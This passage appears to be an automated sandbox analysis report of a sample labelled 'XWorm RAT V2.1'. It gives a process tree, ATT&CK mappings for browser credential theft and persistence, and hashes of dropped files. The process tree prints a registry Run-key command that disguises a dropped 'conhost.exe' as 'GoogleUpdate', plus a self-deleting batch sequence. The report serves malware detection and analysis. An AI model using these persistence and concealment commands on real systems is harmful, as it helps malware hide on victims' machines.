    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        5⤵
        
        PID:5296
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:5360

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1668

C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5848
- C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SendNotifyMessage
  PID:5900
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:5960
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4414.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp4414.tmp.bat
    3⤵
    PID:5064
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:1668
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 5960"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5260
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:5264
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5364
  - - C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe
      "C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of AdjustPrivilegeToken
      PID:5316

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5580

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Command Reciever.exe.log

Filesize
1KB

MD5
83c6657d5c97604293de3be7cb049812

SHA1
049e9604e0dab53524bdbdb9459f6026df675468

SHA256
cc0829436efefdd39837147e213e968d549f35faa2e519e0a038731e4711368a

SHA512
6a814aeb121606355776d864f41dc62a311a151a33eff8593a24dc0748f86519f4f9391525d1eb3d161d3f976dda3470d5c2c2abd63d888b36c0b3822c91a9f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Command Reciever.exe.log

Filesize
1KB

MD5
5200da2e50f24d5d543c3f10674acdcb

SHA1
b574a3336839882d799c0a7f635ea238efb934ee

SHA256
d2d81c1c9d35bc66149beaa77029bee68664d8512fc1efe373180bab77d61026

SHA512
24722a7de3250a6027a411c8b79d0720554c4efd59553f54b94ab77dc21efbf3191e0912901db475f08a6e9c1855d9e9594504d80d27300097418f4384a9d9cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XWorm RAT V2.1.exe.log

Filesize
321B

MD5
08027eeee0542c93662aef98d70095e4

SHA1
42402c02bf4763fcd6fb0650fc13386f2eae8f9b

SHA256
1b9ec007ac8e7de37c61313c5e1b9444df6dc0cd9110553bfa281b13204a646d

SHA512
c4e7a17a1dc1f27c91791439d92435a5d750a065508e9539c9af458f21472a7ce45ba0666ef6855a00386e1a75c518d0908b82d929084a1b67ca4c65997a5979

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004d

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
4659f530c7d26d3604909edce6d6cf5d

SHA1
398381afcde5be5d0e0ce96ad685802b9fd7d7d3

SHA256
bf4915ccce85f32b6c0db5f3fea97f299f3d226b677d4028b0ff8de7ddf0c878

SHA512
90b325218302fb98b0784b1459113f5145e63b40db23c39d5557ea54a18e0718f31287cd1e40ad35a1853946f1bbd2bebcf6fbf976ef100dd0216f9944f04175

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
1a4d054580277673fff26426ab08fb26

SHA1
5e88755f1eed3a289379e8cb145c474793b3e989

SHA256
a5606a26f0c11d52e970dd2ea6b46141e95fd0fd14e1297b1145a97e0d2664ee

SHA512
45fc6ae88d4435e2d520c16a28acb032ad1d507d45ee1a2a9d6592dd2dbef7e9332990c5a187bdf5bc1792ba21c1c1f136b2460733ebf06c4cb8ce5ed2296a48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
824c79a00b660efa60c4241231c4faf7

SHA1
6fa6b5d632f364f2336c0355c0ab5df34e0006bc

SHA256
3e8c3a3ea7cc5d6ef1b5e9d62efd0df61a85699ca46ed1f0c9c8faabb7e40509

SHA512
af941994c7450755378315e8ff55d27936e3e3f3bb486048e4a160e9fcd2865b82676dab1f15b7e656e50ba25c9ab443abece15bf7b1f3fb97f5a191ab39bdf9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
847d06eb3ed210ba665abab55db4a38b

SHA1
8a8c33b220fc3f41511b5b7ff058308eb4aed212

SHA256
783057639d6fa228bc18c430548ac894ce0be9f159411181c2ae1a1bc42cf814

SHA512
2050e9f84caa274b7e2b3c88467fe76b1e0b82f6d0af5c156268f0fdb1b3ed939e80880baf09110914df7771b4838b5a2331278d15bc8bebfdebec66bae7603e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
3a8746c4c5a853fbff453761ee211da5

SHA1
bd9300a55d91bdc099124b8c0eadd9e8f0ade96c

SHA256
d7b5a035a9cb1dc8a20cd74c64033542263470fc66d6d213ae38ffc11a0ffefd

SHA512
1584f18f8f49871b2ba9336f1467337eb723fd8db79a2a13e0039cd22d81e7eeefa3ec9a6eef6c798b3bbe3f445e38624ea5fac7298c77e4d499ddabe520e62f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
808B

MD5
46bddad6b6e9aacf0ff97fe463b54d39

SHA1
fc5818818d26fff457a13ed4f2974c5b25f8f03c

SHA256
ba3950593b995d93ee6c19e574ca0587534db95f7cd7f599852292f2ad2b6775

SHA512
c06be0c0b3936bc076c4be49fb00b4e1ae8d1d81bc1517be02b8fcaac77b56286f6e761f70dde8aa4ae527b0b24f9e465e1c0136d9791cf3f6d1b001a7af398e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
958B

MD5
e5c0a40efd1ea1d90efc3a182b60d42a

SHA1
9e2cc86642b3ca63468029c91bec36630adbca9f

SHA256
7834d9b313ef454181ea7634323b50b139b935d7608ef9f99c507ba62de20a94

SHA512
3eb12c1408c58d529aed8cb2f197a4dd53fb8e071fcf92da676586c3fa3ba55a6f70a68a62c88ba87840246c98ae5f8078ed04df7958678afb5983d9fd990c39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
a82d362e680c8543853f46bf551fbf63

SHA1
2c6b0fdcb0e1f6aaf1ba97ab0955bad5eb200e74

SHA256
95f07c245908d3d4aed5ec31fc57c59bea5aaa1f5233d207d8ecb81f3df84e0f

SHA512
b0ed2b4d250008ff170b861da71bf6a199f5dfc2440d7cd0ee741911e305db16846fe93fc8dc70d4b39bc236bd2151565333bd0dceccbf890f008b9cf9625380

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d65a30826da01433326630a214654f53

SHA1
370b691c8403e21f713f41d0d3a74df5ab6feca2

SHA256
123763be5411b4ee88262613ee9d307a02263d643c5f769d64ad9fa5423e49b1

SHA512
1c2c0e7b323d96821c7757681646ad1fec784e0202d81034bd255d4a6c7fd9866ab2c84e61ef85c17a751b654f4afd9a5719959d78d44e2c19bdcd390e05963d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4df1636699f641c533a11be23d18dd16

SHA1
30f1ad57447125275c3090d330864be75301d4ce

SHA256
0e505240b5ff3dea2969c3923d46e0fd5f1e7719c7a3cfccc7ce7704fa858101

SHA512
e4e2b5f7102aed720d7512398f4b6a97e07b21049598ef9ada0260aeaf7c0fbd35c1462b125382e5f5cc33afeb15aa8aab47c79429c1de4cd2a1e812e2527352

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
56847c262be450dda64acb8d22ac60ba

SHA1
e701a619d8e8d40b7e80021a555cf885e6401c90

SHA256
004beeb7b2273fd185ad5f73def38a8251ba1c8baa2ba6359fae1be7c1447626

SHA512
87963076630ed81482820540656d6e700355162e9202f8dbd0d1718fcc2387c0a6f4805c53f682ce2fd69e5f22197985527ec5c03e9e75a05f56f6c34385ed2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c0cd343648c3382cb518747b653f11f4

SHA1
6fdad8b35dd2ef76efeb3be43918987059741e32

SHA256
3e4d75821b807a15c88d24a97e9f6623893b78604f36b9b5e7b824b3d237232f

SHA512
a37f56922e2f0fb5692684940e43f37de67be7a44c2af03db8f260c76d725b4270f035f76305f219b1fdf2dc0fcd37b1f041352c6de534eec54bcb05afd561d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
5d8775ed6f4d29cdde3d68126e838693

SHA1
6fbf98a64d5e4aeed8115648702e1a9349d10908

SHA256
c2d9811836876dac39411877d4f724361405437e68a0701256b311d1cae249c5

SHA512
0ebc9586eb975669149a12359b0f6d3b0f85bc1ee4afefc279393f79d42e26bde91074627f1c16ec89c172fc71d52afeacf68daae71b00c57d92c2e3490b3bab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a9c350d83f5bd1937c0edcea9093dbdc

SHA1
3eac9feee025a05290814f3f0853807e1e12cd44

SHA256
fad32254fb3865d5048b30624bea819e689db1fb63b329ae054d1e7124b2fa53

SHA512
b1b87d5174fab1ad293a87b404b99861a02e6bee345b9fcd33bfeea5dbb6d6103b74ca8ab237969e7ffa5e3d5989c2fb01af5baf3b552799b340ae5dc1870009

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
245203eb37eb07353c1ebd74dcaf5123

SHA1
46177b702829f655d982ef371c424309102b45c0

SHA256
3916495fd41a59bd1ced3f8fd193aaaff3882410afe177cc0c09e83ba2adbc57

SHA512
b1835cf3ba756d4c8fbbf2ddf649781bcf626e60ca8a6e85f6c95571e0bf9bf8d0111193443c42625196e2112eb9d06f838fb0ee8c6746bfd5a1066a572f19a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
ee95f019aa90249d51ea63e0091db396

SHA1
c56d5c7305904cdf669d1a9f592b7891e77c474b

SHA256
8be42c536db4b09f07e03a8c1b886e404d1908e4d985460c56598d23a1ff8792

SHA512
5fe0e9808be0f2281d9b5e82467308893ffe9aed57e746c2072ac1829f036929899896fde9a7c55c30bd0501f9b64a98b9051f095d95e26cd3b3fb116fba08b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2154da031f2a632a9814502842226815

SHA1
ccf9828d17d4aa6f78aa1b85542d666341b641ee

SHA256
745c9f53224d4fe13ce67816d53cbbd75002fde5807af85e820e80a0079dff1c

SHA512
d7c77996dc057823f3ee8ed027bd89ccc99f1097102201c83dc6aae7a4ae4fe7287a5ffa35e2653ad0018fad951cdd56fd65d204e7e62507e5eb1936f58692e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
07ae177be56a8be884ff22916c083118

SHA1
3afbdd910b6e42d15ba05d4628ed840085ea8417

SHA256
6138991a13a85a3122650942a98e2471a7e9cf4bcf87ff3fda380694f22663e8

SHA512
e248dd05dbb574277764a01e101359cb0fd2c8ce7948da06521bdf03ca552b6f7fd2341029a9673e7b3c97b3d24b8f4f73353a472f299c7da8632aacd941ad32

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
7c2f1092b628158d392c3b785f589d2e

SHA1
df31f919c804e8a41c88093604f05a561398dd26

SHA256
d845af65cff46140caa35d4879a77b71940041cc6d5d5c579f667d5bf1695951

SHA512
6cc219097fc001748bdf0dc204a831b511048b819ec6971d97db83219ea549bad1a2e14b24580f1f43e2a488152f50d76456e08bdd16c14a63d67780562da934

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e279306564424545bcf244fd86bfdf69

SHA1
696adf008d03d5c151e3f5ab924acc85ebc576d7

SHA256
fbd77cfa0634f9de278ad5e831d9dae6fc434aa2e8a27f83d4ee027bcc8ad743

SHA512
a2a022b26a7efc23ef721f22167b81a394b3b480da96b0a3a19abcb1427eb59c6abea2a0d22e2954ef72b46bcb2ad978bf361958ee71399de24852bcb22d077c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe580e14.TMP

Filesize
1KB

MD5
c6d2769941eeb5eec595f6aa5f0ba714

SHA1
f7edfeda2be436191317b4e1fbae35244a721006

SHA256
092720469ff3a6b151d62c9454741ecd0ce433bb49fb8b13782e62f555e18e48

SHA512
af3c794c6e52693c4a86e1e987a1a830cf14dcf4ba1b23ee1b28cb0b204df804de9beff73d8d7b3f15dd52c9b93f28f9a08e058f1e0f29dd4661b73120ba3284

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\6658c569-c587-4726-8ea4-a00e31d13955\3

Filesize
2.5MB

MD5
83ac440ac356f9055beb41848ef3d9b5

SHA1
a8095526362b550dd8f8bedc93ded8b074b025c3

SHA256
fb6d9eef0d758a1be67979a6e063ab8fe8acc468f8ad9ae997eaccde71687dda

SHA512
9f00a6d663342c5ecceddf532f4d95155e49c2a07b7acf2c31cb201c2ae10fdceda40259052480a516e6d070077796eac550b84c82402114e0fe8423dbf5b7c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
0041303f5f0fce7a9dacaf9450775ccf

SHA1
6687253cbbdda8c234e9d6957378630602541c36

SHA256
7e0612ed67571f805c4634d04522646436ddc91dc549b9f46b1d3be9d74d81d7

SHA512
73252886f79a6bad2cde1d5a2312ee916b1f5662c888e1c6559b45455b63c90579fa1ff55900aabb1997d628e38e349ad15592480bb085cb049e17315d56ca10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
0db727a64978545a37289bcb84235f92

SHA1
aeb4cc84a11739e7a5044c38655e7fe04b99738c

SHA256
366ca94cce8965dc2ac3837341025e786e4dc878bdc7f0a8a2b03f9aa70f6157

SHA512
1fcddf5b4dbf75ad9c42319338ba077c600158aaec37d149c4b5085e29367991c1a0d2bd3ecb14db40462a293dfbc25c7a760ba783ebbe4c571ea54b71b7a3f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
b83d9bb7dc2b4f06b9718b712de7c94f

SHA1
8742b9b6a10b64c51f83f591d7ae6ffc8a0cd762

SHA256
21db3e4b4939f8c2cac1a381e774c81ccb421a1e534f7833ae61ecc7104df0a8

SHA512
c194a8b7cd989fc109209c4945cec71d58e567ab9aad9b0a041cb4c65096fdd80546d202014cc07fa30e99e6f6d52cc7d96e0bbbb6a215a1ea7a35fe69392d22

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

Filesize
5.6MB

MD5
eb01eece5f0887b24a1bd53183d801dc

SHA1
49e92aee8351e3a995d8ec95bc64d7f381dcee28

SHA256
a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c

SHA512
83374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839

Download Submit
C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Filesize
1.7MB

MD5
65ccd6ecb99899083d43f7c24eb8f869

SHA1
27037a9470cc5ed177c0b6688495f3a51996a023

SHA256
aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4414.tmp.bat

Filesize
295B

MD5
06b4e08ded30ff2e84a0f1728fdc5386

SHA1
fe276698e00d8de1ea950bc9004e7b31c4b5aaee

SHA256
4de8ceea94b2b224d51258c1709c537b36b354334db2bbfbe4a4a1475a2943a4

SHA512
dad38c05d0e37f96ee33873b4bc3aa48126e22978a713836d9418f32e8425fb3e7a0ff9ce8a6804cc63c928ca4b2570ab1af3f269e2b2b4aea5e8c1366e43d14

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6EB3.tmp.bat

Filesize
295B

MD5
c056e625af6df563187060625c0f155f

SHA1
5269e333a7692a3af5a512d8a8d1f7e21d88a014

SHA256
df3eb761851f0e53a6be60ed4f840544ae7e4c535ef2655de8a0c150dc28fbba

SHA512
ef228f9259a75deb1110da28ab0de300bd02e793e5c4c4d3cc61227ecacd5b5c23d3c138af24eaa9263289278336b298ae262628889bf6750e2dfde186eaa3d2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
memory/1652-362-0x000001DD7FF60000-0x000001DD7FFB0000-memory.dmp

Filesize
320KB

Download
memory/1652-389-0x000001DD67BE0000-0x000001DD67BF2000-memory.dmp

Filesize
72KB

Download
memory/1652-359-0x000001DD00A00000-0x000001DD00A6A000-memory.dmp

Filesize
424KB

Download
memory/1652-361-0x000001DD00C70000-0x000001DD00D22000-memory.dmp

Filesize
712KB

Download
memory/1652-366-0x000001DD00D60000-0x000001DD00D86000-memory.dmp

Filesize
152KB

Download
memory/1652-367-0x000001DD01AB0000-0x000001DD01DDE000-memory.dmp

Filesize
3.2MB

Download
memory/1652-365-0x000001DD00DA0000-0x000001DD00DDA000-memory.dmp

Filesize
232KB

Download
memory/1652-363-0x000001DD67C10000-0x000001DD67C32000-memory.dmp

Filesize
136KB

Download
memory/2108-329-0x0000020BB77F0000-0x0000020BB7866000-memory.dmp

Filesize
472KB

Download
memory/2108-323-0x0000020B9CD40000-0x0000020B9D2E2000-memory.dmp

Filesize
5.6MB

Download
memory/2108-339-0x0000020BB76D0000-0x0000020BB76EE000-memory.dmp

Filesize
120KB

Download
memory/2108-341-0x0000020B9D850000-0x0000020B9D85A000-memory.dmp

Filesize
40KB

Download
memory/2920-317-0x0000000000810000-0x0000000000EA2000-memory.dmp

Filesize
6.6MB

Download
memory/2920-319-0x0000000005700000-0x000000000579C000-memory.dmp

Filesize
624KB

Download
memory/2920-320-0x0000000005880000-0x0000000005912000-memory.dmp

Filesize
584KB

Download
memory/2920-321-0x00000000057B0000-0x00000000057BA000-memory.dmp

Filesize
40KB

Download
memory/2920-340-0x0000000009570000-0x00000000095D6000-memory.dmp

Filesize
408KB

Download
memory/2920-322-0x0000000005A50000-0x0000000005AA6000-memory.dmp

Filesize
344KB

Download
memory/4404-304-0x00000000004D0000-0x0000000000712000-memory.dmp

Filesize
2.3MB

Download
memory/4404-305-0x0000000005670000-0x0000000005C14000-memory.dmp

Filesize
5.6MB

Download